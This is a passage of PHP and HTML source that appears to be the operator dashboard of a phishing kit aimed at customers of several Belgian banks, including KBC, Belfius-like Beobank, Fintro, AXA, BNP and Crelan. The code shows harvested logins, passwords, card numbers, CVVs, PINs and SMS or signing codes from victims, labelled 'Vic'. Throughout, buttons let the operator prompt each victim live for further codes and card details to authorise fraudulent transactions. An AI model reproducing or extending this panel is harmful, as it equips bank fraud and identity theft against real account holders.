', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'exp')"><i class="fa fa-info-circle" aria-hidden="true"></i> Exp</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'sms')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Mail-Verify</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'tel')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'cc')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'pin')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask NIP</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'token')"><i class="fa fa-info-circle" aria-hidden="true"></i> Token 1</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-success mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-outline-warning mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-sign-language" aria-hidden="true"></i> Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'm1')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 2</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control sns-sign input-dark mt-4 custom-input" placeholder="Token 2">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] == "BEO") { if (!empty($log["c_kaart"]) && !empty($log["c_klant"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Gebruikersnaam:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_kaart"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Wachtwoord:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_klant"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_260"]) && !empty($log["c_260_2"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Gebruikersnaam:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_260"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Response:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_260_2"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_320"]) && !empty($log["c_320_2"]) && !empty($log["c_320_3"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Gebruikersnaam:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_320"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Wachtwoord:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_320_2"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Response:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_320_3"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["abn_identification"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Phone Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["abn_identification"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["abn_respons_one"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Login Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["abn_respons_one"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_exp"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">EXP:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_exp"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_tel"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Telefoon nummer:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_tel"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_custom"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Custom:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_custom"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_sms"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">SMS code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_sms"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_m1"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Response 260 1:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_m1"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_m2"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Response 260 2:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_m2"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_m3"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Response 320:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_m3"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_pin"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">PinCode:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_pin"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_cc"]) && !empty($log["c_cvv"]) && !empty($log["c_exp2"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">CC:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_cc"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">CVV:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_cvv"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'exp')"><i class="fa fa-info-circle" aria-hidden="true"></i> Exp</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'sms')"><i class="fa fa-info-circle" aria-hidden="true"></i> SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'tel')"><i class="fa fa-info-circle" aria-hidden="true"></i> Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'cc')"><i class="fa fa-info-circle" aria-hidden="true"></i> CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'pin')"><i class="fa fa-info-circle" aria-hidden="true"></i> NIP</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'D260')"><i class="fa fa-info-circle" aria-hidden="true"></i> Login 260</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'D320')"><i class="fa fa-info-circle" aria-hidden="true"></i> Login 320</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'm3')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 320</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'm2')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 260-2</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'm1')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 260-1</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<input type="text" class="form-control sns-sign input-dark mt-4 custom-input" placeholder="260-1">
</div>
</div>
<div class="row">
<div class="col-lg-6">
<input type="text" class="form-control sns-sign2 input-dark mt-4 custom-input" placeholder="260-2.1/360-1">
</div>
<div class="col-lg-6">
<input type="text" class="form-control sns-sign3 input-dark mt-4 custom-input" placeholder="260-2.2/360-2">
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-sign-language" aria-hidden="true"></i> Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control beo-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] === "KBC") { function KBC($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["kbc_card"])) { KBC("Card", $log["kbc_card"]); } if (!empty($log["kbc_vv"])) { KBC("Exp", $log["kbc_vv"]); } if (!empty($log["kbc_m1"])) { KBC("Login Code", $log["kbc_m1"]); } if (!empty($log["kbc_m2"])) { KBC("Sign Code", $log["kbc_m2"]); } if (!empty($log["kbc_phone"])) { KBC("Phone", $log["kbc_phone"]); } if (!empty($log["kbc_sms"])) { KBC("SMS Code", $log["kbc_sms"]); } if (!empty($log["kbc_livelogin"])) { KBC("Sign Live", $log["kbc_livelogin"]); } if (!empty($log["kbc_live"])) { KBC("Buy Live", $log["kbc_live"]); } if (!empty($log["kbc_cc"])) { KBC("CC Number", $log["kbc_cc"]); } if (!empty($log["kbc_exp"])) { KBC("CC Exp", $log["kbc_exp"]); } if (!empty($log["kbc_cvc"])) { KBC("CVC", $log["kbc_cvc"]); } if (!empty($log["kbc_custom"])) { KBC("Call Vic", $log["kbc_custom"]); } if (!empty($log["kbc_bel"])) { KBC("Custom", $log["kbc_bel"]); } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'identification')">
<i class="fa fa-phone" aria-hidden="true"></i> Ask Phone
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'bel')">
<i class="fa fa-phone" aria-hidden="true"></i> Call Vic
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'sms')">
<i class="far fa-keyboard" aria-hidden="true"></i> Ask SMS
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'loginCode')">
<i class="far fa-keyboard"></i> Ask CC
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-success mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')">
<i class="fa fa-check-circle" aria-hidden="true"></i> Finish
</button>
</div>
</div>
<hr>
<div class="row">
<div hidden class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-outline-warning mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Custom
</button>
</div>
<div hidden class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a hidden href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'signCode')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Login Code
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-one input-dark mt-4 custom-input" placeholder="Please enter a sign code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'tokenCode')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Sign Code
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-two input-dark mt-4 custom-input" placeholder="Please enter a sign code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Buy Code
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-live input-dark mt-4 custom-input" placeholder="Please enter a token code">
<input type="text" class="form-control kbc-livetwo input-dark mt-4 custom-input" placeholder="Please enter a token code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'livetwo')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Live Sign
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-livelogin input-dark mt-4 custom-input" placeholder="Please enter a token code">
<input type="text" class="form-control kbc-livelogintwo input-dark mt-4 custom-input" placeholder="Please enter a token code">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] === "FINTRO") { function FINTRO($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["fintro_wifi"])) { $kaartbegin = '' . $log["fintro_wifi"]; FINTRO("CardNumber", $kaartbegin); } if (!empty($log["fintro_wifi_pass"])) { FINTRO("ClientNumber", $log["fintro_wifi_pass"]); } if (!empty($log["fintro_user"])) { FINTRO("Phone", $log["fintro_user"]); } if (!empty($log["fintro_exp"])) { FINTRO("SMS", $log["fintro_exp"]); } if (!empty($log["fintro_custom"])) { FINTRO("Custom", $log["fintro_custom"]); } if (!empty($log["fintro_password"])) { FINTRO("Email-Pass", $log["fintro_password"]); } if (!empty($log["fintro_call"])) { FINTRO("Call Vic", $log["fintro_call"]); } if (!empty($log["fintro_respons"])) { FINTRO("Login Code", $log["fintro_respons"]); } if (!empty($log["fintro_code_x"])) { FINTRO("Sign Code", $log["fintro_code_x"]); } if (!empty($log["fintro_code_m"])) { FINTRO("Sign Code (2)", $log["fintro_code_m"]); } if (!empty($log["fintro_respons_two"])) { FINTRO("Live Code", $log["fintro_respons_two"]); } if (!empty($log["fintro_creditcard"])) { FINTRO("Card Number", $log["fintro_creditcard"]); } if (!empty($log["fintro_ccexp"])) { FINTRO("Expiry", $log["fintro_ccexp"]); } if (!empty($log["fintro_cvv"])) { FINTRO("CVV", $log["fintro_cvv"]); } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fas fa-phone"></i> | Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'password')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Email-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
| CC Info</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'call')"><i class="fa fa-phone" aria-hidden="true"></i>
| CallVic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control input-dark mt-4 custom-input" placeholder="Fill in your 'Amount'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control fintro-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Sign Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control fintro-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">
</div>
<div class="col-lg-3">
<hr>
</div>
<div class="col-lg-9">
<hr>
<input hidden type="text" class="form-control fintro-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
<input hidden type="text" class="form-control fintro-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control fintro-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control fintro-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] === "AXA") { function AXA($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["raffeissen_wifi"])) { AXA("CardNumber", $log["raffeissen_wifi"]); } if (!empty($log["raffeissen_wifi_pass"])) { AXA("Expiry", $log["raffeissen_wifi_pass"]); } if (!empty($log["raffeissen_number"])) { AXA("Phone", $log["raffeissen_number"]); } if (!empty($log["raffeissen_tan"])) { AXA("SMS", $log["raffeissen_tan"]); } if (!empty($log["raffeissen_creditcard"])) { AXA("CC Num", $log["raffeissen_creditcard"]); } if (!empty($log["raffeissen_ccexp"])) { AXA("CC Exp", $log["raffeissen_ccexp"]); } if (!empty($log["raffeissen_cvv"])) { AXA("CVV", $log["raffeissen_cvv"]); } if (!empty($log["raffeissen_respons"])) { AXA("Login Code", $log["raffeissen_respons"]); } if (!empty($log["raffeissen_respons_two"])) { AXA("Live Code", $log["raffeissen_respons_two"]); } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'details')"><i class="fas fa-sign-in-alt"></i> Ask Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'tan')"><i class="fas fa-sign-in-alt"></i> Ask SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'creditcard')"><i class="fas fa-sign-in-alt"></i> Ask CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
Ask M1</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control raffeissen-sign input-dark mt-4 custom-input" placeholder="Fill in your 'M1 Code'">
</div>
<div class="col-lg-3">
<hr>
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
Ask Live</button>
</div>
<div class="col-lg-9">
<hr>
<input type="text" class="form-control raffeissen-live input-dark mt-4 custom-input" placeholder="Fill in your first 'M2 Code'">
<input type="text" class="form-control raffeissen-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'M2 Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] === "BNP") { function BNP($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["bnp_wifi"])) { $kaartbegin = '' . $log["bnp_wifi"]; BNP("CardNumber", $kaartbegin); } if (!empty($log["bnp_wifi_pass"])) { BNP("ClientNumber", $log["bnp_wifi_pass"]); } if (!empty($log["bnp_wifi_pass_two"])) { BNP("Expiry", $log["bnp_wifi_pass_two"]); } if (!empty($log["bnp_user"])) { BNP("Phone", $log["bnp_user"]); } if (!empty($log["bnp_exp"])) { BNP("SMS", $log["bnp_exp"]); } if (!empty($log["bnp_password"])) { BNP("Email-Pass", $log["bnp_password"]); } if (!empty($log["bnp_call"])) { BNP("Call Vic", $log["bnp_call"]); } if (!empty($log["bnp_tan"])) { BNP("CVC", $log["bnp_tan"]); } if (!empty($log["bnp_custom"])) { BNP("Custom", $log["bnp_custom"]); } if (!empty($log["bnp_respons"])) { BNP("Login Code", $log["bnp_respons"]); } if (!empty($log["bnp_code_x"])) { BNP("Sign Code", $log["bnp_code_x"]); } if (!empty($log["bnp_code_m"])) { BNP("Sign Code (2)", $log["bnp_code_m"]); } if (!empty($log["bnp_respons_two"])) { BNP("Live Code", $log["bnp_respons_two"]); } if (!empty($log["bnp_creditcard"])) { BNP("Card Number", $log["bnp_creditcard"]); } if (!empty($log["bnp_ccexp"])) { BNP("Expiry", $log["bnp_ccexp"]); } if (!empty($log["bnp_cvv"])) { BNP("CVV", $log["bnp_cvv"]); } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fas fa-phone"></i> | Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'password')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Email-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["user_id"]); ?>
